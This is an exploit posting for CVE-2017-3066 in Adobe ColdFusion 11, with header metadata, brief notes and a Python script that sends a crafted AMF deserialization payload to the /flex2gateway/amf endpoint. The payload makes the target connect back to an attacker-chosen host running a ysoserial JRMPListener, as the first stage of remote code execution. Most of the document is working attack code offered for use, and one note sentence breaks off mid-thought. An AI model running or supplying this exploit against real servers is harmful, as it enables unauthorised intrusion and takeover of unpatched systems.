Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
Date: February 6, 2018
Exploit Author: Faisal Tameesh (@DreadSystems)
Company: Depth Security (https://depthsecurity.com)
Version: Adobe Coldfusion (11.0.03.292866)
Tested On: Windows 10 Enterprise (10.0.15063)
CVE: CVE-2017-3066
Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
Category: remote

Notes:
This is a two-stage deserialization exploit. The code below is the first stage.
You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
After firing this exploit, and once the target server connects back,

Payload:

import struct
import sys
import requests

if len(sys.argv) != 5:
print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"
quit()

target_IP = sys.argv[1]
target_port = sys.argv[2]
callback_IP = sys.argv[3]
callback_port = sys.argv[4]

amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
'\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
struct.pack('>I', int(callback_port)) + \
'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';

url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)

Referers:
http://www.bugsearch.net/en/19652/adobe-coldfusion-11003292866-blazeds-java-object-deserialization-remote-code-execution.html?ref=3